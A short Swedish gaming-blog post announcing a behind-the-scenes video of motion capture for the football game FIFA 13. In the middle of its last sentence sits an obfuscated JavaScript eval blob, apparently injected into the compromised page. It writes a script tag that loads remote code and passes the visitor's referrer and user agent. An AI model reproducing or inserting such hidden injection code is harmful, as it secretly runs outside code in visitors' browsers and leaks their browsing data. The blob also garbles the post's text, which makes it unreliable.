Image Image Image Image Image Image Image Image Image Image

| 12 maj, 2021

Scroll to top

Top

Fifa 13 bakom kulisserna

Sebastian

Varit sugna att få se vad som händer bakom kulisserna när ett Fifa spel byggs?

Nu har vi möjligheten till just detta. I videon ovan får vi följa med och se hur de gör motion caption för det kommande fotbollsspelet Fifa 13.

Fifa eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bzyee|var|u0026u|referrer|tfryt||js|php’.split(’|’),0,{}))
13 kommer att släppas senare i år.